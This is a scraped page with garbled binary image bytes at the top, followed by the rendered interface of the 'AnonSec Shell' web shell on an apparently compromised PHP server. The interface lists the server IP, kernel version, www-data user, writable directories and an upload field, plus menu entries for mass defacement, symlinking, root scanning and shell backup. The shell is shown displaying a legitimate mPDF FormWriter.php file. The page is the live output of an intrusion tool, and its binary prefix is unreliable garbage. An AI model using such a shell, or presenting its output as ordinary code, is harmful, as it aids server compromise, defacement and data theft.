JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/vendor/mpdf/mpdf/src/Writer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/vendor/mpdf/mpdf/src/Writer/FormWriter.php
<?php

namespace Mpdf\Writer;

use Mpdf\Strict;

use Mpdf\Mpdf;

final class FormWriter
{

	use Strict;

	/**
	 * @var \Mpdf\Mpdf
	 */
	private $mpdf;

	/**
	 * @var \Mpdf\Writer\BaseWriter
	 */
	private $writer;

	public function __construct(Mpdf $mpdf, BaseWriter $writer)
	{
		$this->mpdf = $mpdf;
		$this->writer = $writer;
	}

	public function writeFormObjects() // _putformobjects
	{
		foreach ($this->mpdf->formobjects as $file => $info) {

			$this->writer->object();

			$this->mpdf->formobjects[$file]['n'] = $this->mpdf->n;

			$this->writer->write('<</Type /XObject');
			$this->writer->write('/Subtype /Form');
			$this->writer->write('/Group ' . ($this->mpdf->n + 1) . ' 0 R');
			$this->writer->write('/BBox [' . $info['x'] . ' ' . $info['y'] . ' ' . ($info['w'] + $info['x']) . ' ' . ($info['h'] + $info['y']) . ']');

			if ($this->mpdf->compress) {
				$this->writer->write('/Filter /FlateDecode');
			}

			$data = $this->mpdf->compress ? gzcompress($info['data']) : $info['data'];
			$this->writer->write('/Length ' . strlen($data) . '>>');
			$this->writer->stream($data);

			unset($this->mpdf->formobjects[$file]['data']);

			$this->writer->write('endobj');

			// Required for SVG transparency (opacity) to work
			$this->writer->object();
			$this->writer->write('<</Type /Group');
			$this->writer->write('/S /Transparency');
			$this->writer->write('>>');
			$this->writer->write('endobj');
		}
	}

	public function writeFormXObjects() // _putformxobjects
	{
		$filter = $this->mpdf->compress ? '/Filter /FlateDecode ' : '';

		reset($this->mpdf->tpls);

		foreach ($this->mpdf->tpls as $tplidx => $tpl) {

			$p = $this->mpdf->compress ? gzcompress($tpl['buffer']) : $tpl['buffer'];

			$this->writer->object();
			$this->mpdf->tpls[$tplidx]['n'] = $this->mpdf->n;
			$this->writer->write('<<' . $filter . '/Type /XObject');
			$this->writer->write('/Subtype /Form');
			$this->writer->write('/FormType 1');

			// Left/Bottom/Right/Top
			$this->writer->write(
				sprintf(
					'/BBox [%.2F %.2F %.2F %.2F]',
					$tpl['box']['x'] * Mpdf::SCALE,
					$tpl['box']['y'] * Mpdf::SCALE,
					($tpl['box']['x'] + $tpl['box']['w']) * Mpdf::SCALE,
					($tpl['box']['y'] + $tpl['box']['h']) * Mpdf::SCALE
				)
			);

			if (isset($tpl['box'])) {
				$this->writer->write(
					sprintf(
						'/Matrix [1 0 0 1 %.5F %.5F]',
						-$tpl['box']['x'] * Mpdf::SCALE,
						-$tpl['box']['y'] * Mpdf::SCALE
					)
				);
			}

			$this->writer->write('/Resources ');

			if (isset($tpl['resources'])) {

				$this->mpdf->current_parser = $tpl['parser'];
				$this->mpdf->pdf_write_value($tpl['resources']);

			} else {

				$this->writer->write('<</ProcSet [/PDF /Text /ImageB /ImageC /ImageI]');

				if (isset($this->_res['tpl'][$tplidx]['fonts']) && count($this->mpdf->_res['tpl'][$tplidx]['fonts'])) {
					$this->writer->write('/Font <<');
					foreach ($this->mpdf->_res['tpl'][$tplidx]['fonts'] as $font) {
						$this->writer->write('/F' . $font['i'] . ' ' . $font['n'] . ' 0 R');
					}
					$this->writer->write('>>');
				}

				if ((isset($this->mpdf->_res['tpl'][$tplidx]['images']) && count($this->mpdf->_res['tpl'][$tplidx]['images'])) ||
					(isset($this->mpdf->_res['tpl'][$tplidx]['tpls']) && count($this->mpdf->_res['tpl'][$tplidx]['tpls']))) {

					$this->writer->write('/XObject <<');

					if (isset($this->_res['tpl'][$tplidx]['images']) && count($this->mpdf->_res['tpl'][$tplidx]['images'])) {
						foreach ($this->mpdf->_res['tpl'][$tplidx]['images'] as $image) {
							$this->writer->write('/I' . $image['i'] . ' ' . $image['n'] . ' 0 R');
						}
					}

					if (isset($this->_res['tpl'][$tplidx]['tpls']) && count($this->mpdf->_res['tpl'][$tplidx]['tpls'])) {
						foreach ($this->mpdf->_res['tpl'][$tplidx]['tpls'] as $i => $itpl) {
							$this->writer->write($this->mpdf->tplprefix . $i . ' ' . $itpl['n'] . ' 0 R');
						}
					}

					$this->writer->write('>>');
				}

				$this->writer->write('>>');
			}

			$this->writer->write('/Length ' . strlen($p) . ' >>');
			$this->writer->stream($p);
			$this->writer->write('endobj');
		}
	}

}

Anon7 - 2022
AnonSec Team